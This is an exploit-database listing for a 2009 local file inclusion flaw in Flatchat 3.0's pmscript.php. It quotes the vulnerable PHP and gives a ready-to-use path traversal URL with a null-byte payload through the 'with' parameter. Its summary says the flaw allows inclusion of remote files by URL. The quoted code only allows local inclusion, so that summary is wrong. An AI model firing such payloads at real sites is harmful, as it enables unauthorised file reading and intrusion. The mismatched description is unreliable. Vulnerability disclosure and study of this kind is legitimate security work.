header-logo
Suggest Exploit
vendor:
Flatchat
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Flatchat
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability

A vulnerability in Flatchat 3.0 allows an attacker to include a file from a remote server via a URL in the 'with' parameter in pmscript.php. This can be exploited to execute arbitrary PHP code by including files from external resources that contain malicious code.

Mitigation:

Input validation should be used to prevent the inclusion of files from external sources.
Source

Exploit-DB raw data:

##########################################################################################
[+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Local File Inclusion

  - Vulnerable code in pmscript.php

--------------------------------------------
$filename = 'users/'.$_GET['with'].'.php';

if (file_exists($filename)) {
    include($filename);
--------------------------------------------


    http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00

##########################################################################################

# milw0rm.com [2009-04-27]